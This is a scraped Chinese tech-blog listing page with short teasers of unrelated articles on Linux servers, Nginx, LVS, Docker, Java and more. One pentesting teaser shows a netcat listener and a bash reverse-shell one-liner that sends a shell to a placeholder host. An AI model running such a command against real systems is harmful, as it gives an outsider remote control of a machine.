Linux的使用相信大家都要用到java吧！在使用java前我们得先安装jdk以及配置环境变量等工作；下面小编给大家分享关于Linux安装jdk的详细步骤：【Linux服务器远程连接工具】xshell6快捷下载，xftp6快捷下载温馨提示：xshell负责编写和执行Linux命令，就是大家都知道的命令行。xftp负责上传和下载文件。两款软件搭配使用。还有一款免费的国产的linux远程连接客户端—f
VMWare10下安装Centos7+PHP7.2+Mysql5.7+Nginx全流程追风2019 服务器 PHP7.2 Mysq
一、背景说明作为一名phper，基本和Linux服务器扯不开关系，如果习惯于在Windows下开发项目，结果是很长一段时间都会烦恼于上线后出现的各种问题，所以，如果线下开发环境也是Linux环境，这就极大保障了自己代码上线正确率。现在比较流行用一键安装工具，只是我在线上、线下都试过，线上虽然安装好了，但线下安装太费内存，安装了两次都因为内存不够失败。所以，鉴于这样的需求背景下，我们自然需要熟练、独
Linux-文件权限管理蜡笔晴天 linux 运维服务器
目录目录前言Linux用户权限解析1.基本权限UGO1.1设置权限：2.高级权限2.1suid2.2sgid2.3sbit2.4sudo给普通用户提权3.特殊权限4.隐藏权限总结前言linux服务器上有严格的权限等级，如果权限过高导致误操作会增加服务器的风险。所以对于了解linux系统中的各种权限及要给用户，服务等分配合理的权限十分重要。文件权限大致分为基本权限、高级权限、特殊权限和隐藏权限，下面
linux查看jupyter运行,在Linux服务器上运行Jupyter notebook server教程天启大烁哥
在Linux服务器上运行Jupyternotebookserver教程很多deeplearning教程都推荐在jupyternotebook运行python代码，方便及时交互。但只在本地运行没有GPU环境，虽然googlecolab是个好办法，但发现保存模型后在云端找不到模型文件，且需要合理上网才能访问。于是想给实验室的服务器配置jupyternotebook，供本机远程访问。踩了不少坑，码一下教
使用PHP和MQTT构建高效的物联网数据转发服务器流程极客小张 php 物联网服务器单片机运维 MQTT 数据库
一、项目概述项目目标和用途本项目旨在搭建一个基于PHP的物联网服务器，能够接收来自各种传感器的数据，并通过MQTT协议将数据转发到其他设备或服务。该系统适用于智能家居、环境监测等场景，能够实现实时数据监控和远程控制。技术栈关键词PHPMQTTMySQLESP8266/ESP32（单片机）DHT11（温湿度传感器）Linux服务器Apache/Nginx二、系统架构系统架构设计本项目的系统架构主要由
在 Linux 上部署javaWeb项目+图文详解_java web项目部署到linux服务器 2401_85154737 服务器 linux java
-f:force强制的意思，如果目标文件已经存在，不会询问直接覆盖-i:若目标已经存在，就会询问是否覆盖-u:若目标文件已经存在，且比目标文件新，才会更新#该命令可以把多个文件一次移动到一个文件夹中，但是最后的一个目标文件一要是“目录”。例如：mvfile1file2file3dir#把多个文件移动到dir目录中mvfile1file2#把file重命名为file26、rm命令该命令用于删除文件或
【LINUX】阿里云linux服务器上使用iptables设置安全策略的方法_status=$(grep -i ubuntu etc issue) 2401_85154737 linux 服务器阿里云
yuminstall-yiptablesiptables安装好后就可以来配置规则了。由于作为web服务器来使用，所以对外要开放80端口，另外肯定要通过ssh进行服务器管理，22端口也要对外开放，当然最好是把ssh服务的默认端口改掉，在公网上会有很多人试图破解密码的，如果修改端口，记得要把该端口对外开发，否则连不上就悲剧了。下面提供配置规则的详细说明：第一步：清空所有规则当ChainINPUT(po
linux服务器时间相差8个小时的问题的解决方法清风一徐服务器 linux 运维
出现时间差一般都是因为时区设置不正确所导致的。首先，使用date命令查看服务器的时间，date+%Z可以查看当前系统的时区设置。这里显示的是UTC时间，因为UTC是标准时间，而中国位于东八区,所以对应的时间是UTC时间加8小时，所以相差8个小时。root@localhost:~#date2023年07月05日星期三07:00:27UTCroot@localhost:~#date+%ZUTC重新设置
8.12（LVS负载均衡） WPFwpf_ lvs 负载均衡运维
一、LVS（一）什么是LVSlinuxvirturalserver的简称，也就是linxu虚拟机服务器，这是一个由章文岩博士发起的开源项目，官网是http://www.linuxvirtualserver.org,现在lvs已经是linux内核标准的-部分，使用lvS可以达到的技术目标是:通过linux达到负载均衡技术和linux操作系统实现一个高性能高可用的linux服务器集群，他具有良好的可性
Nginx配置SSL证书忘了呼吸的那只猫
Nginx配置SSL证书，前提是Nginx安装成功和SSL证书已经获取。在我们下载的证书文件中有一个Nginx的文件夹，这里面的两个文件都是需要的。我们需要把这个两个文件上传到linux服务器中，推荐放到/etc/ssl/目录下然后我们需要去找到nginx的配置文件。ps-ef|grepnginx可以看到nginx的目录是/usr/local/nginx那么我们需要找到nginx.conf文件并修
linux命令之服务器之间文件传输 abments linux常用命令 python pandas 数据分析
目录前言一、scp命令1.简单用法：2.使用示例：2.1.复制文件到本地2.2.复制文件夹到本地二、sftp命令1.简单用法：2.使用示例2.1下载文件2.2上传文件总结前言在使用linux服务器时，有可能会需要在服务器之间传入文件，在这里记录了两种命令来进行实现。分别是scp命令和stpf命令。下面将详细介绍这两个命令的使用。一、scp命令scp：远程文件拷贝程序，是securecopyprog
LVS基本介绍 weixin_34144450 前端操作系统 ldap ViewUI
一、LVS概念LVS是LinuxVirtualServer的简称，也就是Linux虚拟服务器。这是一个由章文嵩博士发起的一个开源项目，它的官方网站是http://www.linuxvirtualserver.org/.现在LVS已经是Linux内核标准的一部分。使用LVS可以达到的技术目标是：通过LVS达到的负载均衡技术和Linux操作系统实现一个高性能高可用的Linux服务器群集，它具有良好的可
【Linux服务器故障排查实用指南】 weixin_34214500 操作系统网络 python
原文地址：【Linux服务器故障排查实用指南】作者：蚁巡运维平台#运维#http://www.antvision.cn/由于造成网络问题的因素多种多样，因此网络故障排查技能就成了每位服务器或网络服务负责人必不可少的重要素质。Linux为我们提供了大量网络故障排查工具，在本文中，我们将讨论一些常见的网络问题，并介绍如何利用某些Linux工具追踪意外状况发生的根本原因。问题：服务器A无法与服务器B通信
linux服务器程序设计模型,Linux下几种并发服务器的实现模式(详解) tianjiaxiaoer linux服务器程序设计模型
1>单线程或者单进程相当于短链接，当accept之后，就开始数据的接收和数据的发送，不接受新的连接，即一个server，一个client不存在并发。2>循环服务器和并发服务器1.循环服务器：一个server只能一次只能接收一个client，当当前client结束访问之后才能进行下一个client的连接。2.并发服务器：一个server同一时间可以响应很多客户端的访问。3>select+多线程模式并
Nginx中间件配置 message丶小和尚中间件 nginx 中间件运维
Nginx中间件配置概要相关内容技术细节链接概要用于Linux服务器，Nginx中间件搭建。相关内容配置涵盖域名配置，TLS配置，及配置安全的加密算法，处理跨域问题，请求头问题等技术细节nginx.conf配置文件userroot;worker_processes2;error_log/var/log/nginx/error.logwarn;pid/var/run/nginx.pid;events
【云原生】Docker入门 -- 阿里云服务器Linux环境下安装Docker m0_61067876 服务器云原生 docker
输入y确认即可！️配置阿里云加速镜像打开阿里云控制台，弹性计算-->容器与镜像服务打开之后选择镜像工具-->镜像加速器，复制内容即可进入Linux服务器根据步骤配置镜像加速器#创建docker文件夹sudomkdir-p/etc/docker#打开文件并配置内容sudotee/etc/docker/daemon.json<<-'EOF'{"registry-mirrors":["https://p
phpstrom连接远程服务器努力学习的笨小孩
PHP开发工具phpstorm通过sftp和FTP远程连接服务器创建编辑远程项目PhpStorm是一个编辑PHP代码的PHP开发工具神器，应该说是目前世界上编辑PHP代码的最好用的PHP开发工具IDE了吧，本地项目的创建相信一般人都会，不过有时候我们可能项目运行在远程服务器上，比如有一种情况：在windows下使用PhpStorm编码，代码放在linux服务器上运行。还有一种情况,代码使用版本控制
python如何对excel批量加密_python实现linux服务器批量修改密码并生成execl weixin_39963523
批量修改linux服务器密码，同时生成execl表格#!/usr/bin/envpython#coding:utf8#随机生成自定义长度密码fromrandomimportchoiceimportstring,pickledefGenPassword(length=8,chars=string.ascii_letters+string.digits):return''.join([choice(c
使用Docker构建支持中文字体的Java镜像 DN金猿 docker docker java 文字方框
做停车场生成二维码时，在代码中用到在图片上添加文字或水印，文字在本地正常显示，到linux服务器就显示方框，由于我用的是docker部署的java项目，所以在linux服务器中安装了中文字体还是无效，因为项目是部署中docker容器里。Fontfont3=newFont("微软雅黑",Font.PLAIN,72);微软雅黑字体显示方框（方框部分是添加的文字）后来查了很多资料，发现都不行。因为我的D
【CentOS7】【配置本地yum源】酷大有 centos
转载自：https://zhuanlan.zhihu.com/p/5783873591本地使用yum源1.1基于iso镜像的centos源1.1.1准备iso#首先看自己使用的linux服务器内核版本[root@centos-2009home]#cat/etc/redhat-releaseCentOSLinuxrelease7.9.2009(Core)#下载对应版本的linux镜像#我这里用的时清
SSH和Git的基本知识 0zxm ssh git 运维 vscode
教程PPT-lec2-2023秋冬实用技能拾遗(tonycrane.cc)B站视频SSH安全外壳协议概念SSH全称secureshell，安全外壳协议（安全的shell），是一个计算机网络协议（默认端口号为22）。通过ssh协议可以在客户端安全（提供身份认证、信息加密）的远程连接Linux服务器或其他设备。使用广泛的Xshell软件就是基于SSH协议远程连接。SSH远程连接之后能干什么？SSH远程
Linux中Git推送报错Permissions 0644 for ‘/root/.ssh/id_rsa‘ are too open 秦时明月之君临天下 Linux Git GitHub linux git ssh
准备在Linux上配置秘钥，方便Git上传代码到GitHub。但是秘钥(id_rsa文件)是从本地Windows环境上传到Linux服务器上面的，在执行推送时报错了，如下：#gitpush-uoriginmainTheauthenticityofhost'github.com(20.205.243.166)'can'tbeestablished.ECDSAkeyfingerprintisSHA25
汇总：20个Linux服务器性能调优技巧开源Linux 数据库 linux java 大数据 mysql
Linux是一种开源操作系统，它支持各种硬件平台，Linux服务器全球知名，它和Windows之间最主要的差异在于，Linux服务器默认情况下一般不提供GUI(图形用户界面)，而是命令行界面，它的主要目的是高效处理非交互式进程，响应时间并不是那么重要，相反，能够长时间处理高负载才是最关键的。Linux高可用服务器集群解决方案让IT系统管理员可以从容应对许多常见的硬件和软件故障，允许多台计算机一起工
LINUX环境中宝塔Python虚拟环境变量问题老童聊AI 明哥陪你学Python python python django
在日常开发和维护过程中，尤其是在处理Linux服务器环境的数据修复或执行其他Django命令时，通常需要手动导入环境变量，操作起来非常不安全和麻烦。这对于开发者来说，特别是通过SSH工具操作时，显得尤为麻烦。每次操作都需要先加载环境变量，然后再执行脚本。例如：#变量加载exportDJANGO_ENV=productionexportDJANGO_SETTINGS_MODULE=douniu.se
常见反弹shell的方法 A 八方安全
在渗透测试的过程中，在拿到webshell以后，如果目标主机是Windows主机，则是通过开3389端口在远程连接，如果目标主机是linux服务器，一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。Bash反弹1.1方法一攻击者主机上执行监听：nc-lvvpport目标主机上执行：bash-i>&/dev/tcp/x.x.x.x/port0>&1#bash-i打开
ASM系列五利用TreeApi 解析生成Class lijingyao8206 ASM 字节码动态生成 ClassNode TreeAPI
前面CoreApi的介绍部分基本涵盖了ASMCore包下面的主要API及功能，其中还有一部分关于MetaData的解析和生成就不再赘述。这篇开始介绍ASM另一部分主要的Api。TreeApi。这一部分源码是关联的asm-tree-5.0.4的版本。在介绍前，先要知道一点， Tree工程的接口基本可以完
链表树——复合数据结构应用实例 bardo 数据结构树型结构表结构设计链表菜单排序
我们清楚：数据库设计中，表结构设计的好坏，直接影响程序的复杂度。所以，本文就无限级分类（目录）树与链表的复合在表设计中的应用进行探讨。当然，什么是树，什么是链表，这里不作介绍。有兴趣可以去看相关的教材。需求简介：经常遇到这样的需求，我们希望能将保存在数据库中的树结构能够按确定的顺序读出来。比如，多级菜单、组织结构、商品分类。更具体的，我们希望某个二级菜单在这一级别中就是第一个。虽然它是最后
为啥要用位运算代替取模呢 chenchao051 位运算哈希汇编
在hash中查找key的时候，经常会发现用&取代%，先看两段代码吧， JDK6中的HashMap中的indexFor方法： /** * Returns index for hash code h. */ static int indexFor(int h, int length) {
最近的情况麦田的设计者生活感悟计划软考想
今天是2015年4月27号整理一下最近的思绪以及要完成的任务 1、最近在驾校科目二练车，每周四天，练三周。其实做什么都要用心，追求合理的途径解决。为
PHP去掉字符串中最后一个字符的方法 IT独行者 PHP 字符串
今天在PHP项目开发中遇到一个需求，去掉字符串中的最后一个字符原字符串1,2,3,4,5,6, 去掉最后一个字符","，最终结果为1,2,3,4,5,6 代码如下： $str = "1,2,3,4,5,6,"; $newstr = substr($str,0,strlen($str)-1); echo $newstr;
hadoop在linux上单机安装过程 _wy_ linux hadoop
1、安装JDK jdk版本最好是1.6以上，可以使用执行命令java -version查看当前JAVA版本号，如果报命令不存在或版本比较低，则需要安装一个高版本的JDK，并在/etc/profile的文件末尾，根据本机JDK实际的安装位置加上以下几行： export JAVA_HOME=/usr/java/jdk1.7.0_25
JAVA进阶----分布式事务的一种简单处理方法无量多系统交互分布式事务
每个方法都是原子操作：提供第三方服务的系统，要同时提供执行方法和对应的回滚方法 A系统调用B,C,D系统完成分布式事务 =========执行开始======== A.aa(); try { B.bb(); } catch(Exception e) { A.rollbackAa(); } try { C.cc(); } catch(Excep
安墨移动广告：移动DSP厚积薄发引领未来广告业发展命脉矮蛋蛋 hadoop 互联网
　　“谁掌握了强大的DSP技术，谁将引领未来的广告行业发展命脉。”2014年，移动广告行业的热点非移动DSP莫属。各个圈子都在纷纷谈论，认为移动DSP是行业突破点，一时间许多移动广告联盟风起云涌，竞相推出专属移动DSP产品。　　到底什么是移动DSP呢? 　　DSP(Demand-SidePlatform)，就是需求方平台，为解决广告主投放的各种需求，真正实现人群定位的精准广
myelipse设置 alafqq IP
在一个项目的完整的生命周期中，其维护费用，往往是其开发费用的数倍。因此项目的可维护性、可复用性是衡量一个项目好坏的关键。而注释则是可维护性中必不可少的一环。注释模板导入步骤安装方法：打开eclipse/myeclipse 选择 window-->Preferences-->JAVA-->Code-->Code
java数组百合不是茶 java数组
java数组的声明创建初始化； java支持C语言数组中的每个数都有唯一的一个下标一维数组的定义声明： int[] a = new int[3];声明数组中有三个数int[3] int[] a 中有三个数，下标从0开始，可以同过for来遍历数组中的数
javascript读取表单数据 bijian1013 JavaScript
利用javascript读取表单数据，可以利用以下三种方法获取： 1、通过表单ID属性：var a = document.getElementByIdx_x_x("id"); 2、通过表单名称属性：var b = document.getElementsByName("name"); 3、直接通过表单名字获取：var c = form.content.
探索JUnit4扩展：使用Theory bijian1013 java JUnit Theory
理论机制（Theory）一.为什么要引用理论机制（Theory）当今软件开发中，测试驱动开发（TDD — Test-driven development）越发流行。为什么 TDD 会如此流行呢？因为它确实拥有很多优点，它允许开发人员通过简单的例子来指定和表明他们代码的行为意图。 TDD 的优点： &nb
[Spring Data Mongo一]Spring Mongo Template操作MongoDB bit1129 template
什么是Spring Data Mongo Spring Data MongoDB项目对访问MongoDB的Java客户端API进行了封装，这种封装类似于Spring封装Hibernate和JDBC而提供的HibernateTemplate和JDBCTemplate，主要能力包括 1. 封装客户端跟MongoDB的链接管理 2. 文档-对象映射，通过注解:@Document(collectio
【Kafka八】Zookeeper上关于Kafka的配置信息 bit1129 zookeeper
问题： 1. Kafka的哪些信息记录在Zookeeper中 2. Consumer Group消费的每个Partition的Offset信息存放在什么位置 3. Topic的每个Partition存放在哪个Broker上的信息存放在哪里 4. Producer跟Zookeeper究竟有没有关系？没有关系！！！ //consumers、config、brokers、cont
java OOM内存异常的四种类型及异常与解决方案 ronin47 java OOM 内存异常
　OOM异常的四种类型：　　　　　一：　StackOverflowError ：通常因为递归函数引起（死递归，递归太深）。-Xss 128k 一般够用。　二：　out Of memory: PermGen Space：通常是动态类大多，比如web 服务器自动更新部署时引起。-Xmx
java-实现链表反转-递归和非递归实现 bylijinnan java
20120422更新：对链表中部分节点进行反转操作，这些节点相隔k个： 0->1->2->3->4->5->6->7->8->9 k=2 8->1->6->3->4->5->2->7->0->9 注意1 3 5 7 9 位置是不变的。解法：将链表拆成两部分： a.0-&
Netty源码学习-DelimiterBasedFrameDecoder bylijinnan java netty
看DelimiterBasedFrameDecoder的API，有举例：接收到的ChannelBuffer如下： +--------------+ | ABC\nDEF\r\n | +--------------+ 经过DelimiterBasedFrameDecoder(Delimiters.lineDelimiter())之后，得到： +-----+----
linux的一些命令 -查看cc攻击-网口ip统计等 hotsunshine linux
Linux判断CC攻击命令详解 2011年12月23日 ⁄ 安全 ⁄ 暂无评论查看所有80端口的连接数 netstat -nat|grep -i '80'|wc -l 对连接的IP按连接数量进行排序 netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n 查看TCP连接状态 n
Spring获取SessionFactory ctrain sessionFactory
String sql = "select sysdate from dual"; WebApplicationContext wac = ContextLoader.getCurrentWebApplicationContext(); String[] names = wac.getBeanDefinitionNames(); for(int i=0; i&
Hive几种导出数据方式 daizj hive 数据导出
Hive几种导出数据方式 1.拷贝文件如果数据文件恰好是用户需要的格式，那么只需要拷贝文件或文件夹就可以。 hadoop fs –cp source_path target_path 2.导出到本地文件系统 --不能使用insert into local directory来导出数据，会报错 --只能使用
编程之美 dcj3sjt126com 编程 PHP 重构
我个人的 PHP 编程经验中，递归调用常常与静态变量使用。静态变量的含义可以参考 PHP 手册。希望下面的代码，会更有利于对递归以及静态变量的理解 header("Content-type: text/plain"); function static_function () { static $i = 0; if ($i++ < 1
Android保存用户名和密码 dcj3sjt126com android
转自：http://www.2cto.com/kf/201401/272336.html 我们不管在开发一个项目或者使用别人的项目，都有用户登录功能，为了让用户的体验效果更好，我们通常会做一个功能，叫做保存用户，这样做的目地就是为了让用户下一次再使用该程序不会重新输入用户名和密码，这里我使用3种方式来存储用户名和密码 1、通过普通的txt文本存储 2、通过properties属性文件进行存
Oracle 复习笔记之同义词 eksliang Oracle 同义词 Oracle synonym
转载请出自出处：http://eksliang.iteye.com/blog/2098861 1.什么是同义词同义词是现有模式对象的一个别名。概念性的东西，什么是模式呢？创建一个用户，就相应的创建了一个模式。模式是指数据库对象，是对用户所创建的数据对象的总称。模式对象包括表、视图、索引、同义词、序列、过
Ajax案例 gongmeitao Ajax jsp
数据库采用Sql Server2005 项目名称为:Ajax_Demo 1.com.demo.conn包 package com.demo.conn; import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException; //获取数据库连接的类public class DBConnec
ASP.NET中Request.RawUrl、Request.Url的区别 hvt .net Web C#asp.net hovertree
如果访问的地址是：http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree%3C&n=myslider#zonemenu那么Request.Url.ToString() 的值是：http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree<&
SVG 教程（七）SVG 实例，SVG 参考手册天梯梦 svg
SVG 实例在线实例下面的例子是把SVG代码直接嵌入到HTML代码中。谷歌Chrome，火狐，Internet Explorer9，和Safari都支持。注意：下面的例子将不会在Opera运行，即使Opera支持SVG - 它也不支持SVG在HTML代码中直接使用。 SVG 实例 SVG基本形状一个圆矩形不透明矩形一个矩形不透明2 一个带圆角矩
事务管理 luyulong java spring 编程事务
事物管理 spring事物的好处为不同的事物API提供了一致的编程模型支持声明式事务管理提供比大多数事务API更简单更易于使用的编程式事务管理API 整合spring的各种数据访问抽象 TransactionDefinition 定义了事务策略 int getIsolationLevel()得到当前事务的隔离级别 READ_COMMITTED
基础数据结构和算法十一：Red-black binary search tree sunwinner Algorithm Red-black
The insertion algorithm for 2-3 trees just described is not difficult to understand; now, we will see that it is also not difficult to implement. We will consider a simple representation known
centos同步时间 stunizhengjia linux 集群同步时间
做了集群，时间的同步就显得非常必要了。以下是查到的如何做时间同步。在CentOS 5不再区分客户端和服务器，只要配置了NTP，它就会提供NTP服务。 1)确认已经ntp程序包： # yum install ntp 2)配置时间源（默认就行，不需要修改） # vi /etc/ntp.conf server pool.ntp.o
ITeye 9月技术图书有奖试读获奖名单公布 ITeye管理员 ITeye
ITeye携手博文视点举办的9月技术图书有奖试读活动已圆满结束，非常感谢广大用户对本次活动的关注与参与。 9月试读活动回顾：http://webmaster.iteye.com/blog/2118112本次技术图书试读活动的优秀奖获奖名单及相应作品如下（优秀文章有很多，但名额有限，没获奖并不代表不优秀）：《NFC：Arduino、Andro